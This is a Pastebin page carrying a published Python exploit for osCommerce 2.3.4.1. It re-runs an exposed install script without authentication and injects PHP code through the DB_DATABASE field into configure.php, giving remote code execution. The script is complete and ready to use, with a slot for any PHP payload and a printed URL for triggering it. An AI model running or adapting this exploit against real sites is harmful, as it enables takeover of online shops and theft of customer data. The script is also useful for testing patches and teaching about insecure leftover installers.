Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
- # Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
- # Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
- # Tested on: Linux, Windows
- # If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
- # for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
- # is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
- # execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
- # PHP code into the config file and then simply executing the code by opening it.
- import requests
- # enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
- base_url = "http://localhost//oscommerce-2.3.4.1/catalog/"
- target_url = "http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4"
- data = {
- 'DIR_FS_DOCUMENT_ROOT': './'
- }
- # the payload will be injected into the configuration file via this code
- # ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
- # so the format for the exploit will be: '); PAYLOAD; /*
- payload = '\');'
- payload += 'system("ls");' # this is where you enter you PHP payload
- payload += '/*'
- data['DB_DATABASE'] = payload
- # exploit it
- r = requests.post(url=target_url, data=data)
- if r.status_code == 200:
- print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
- else:
- print("[-] Exploit did not execute as planned")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement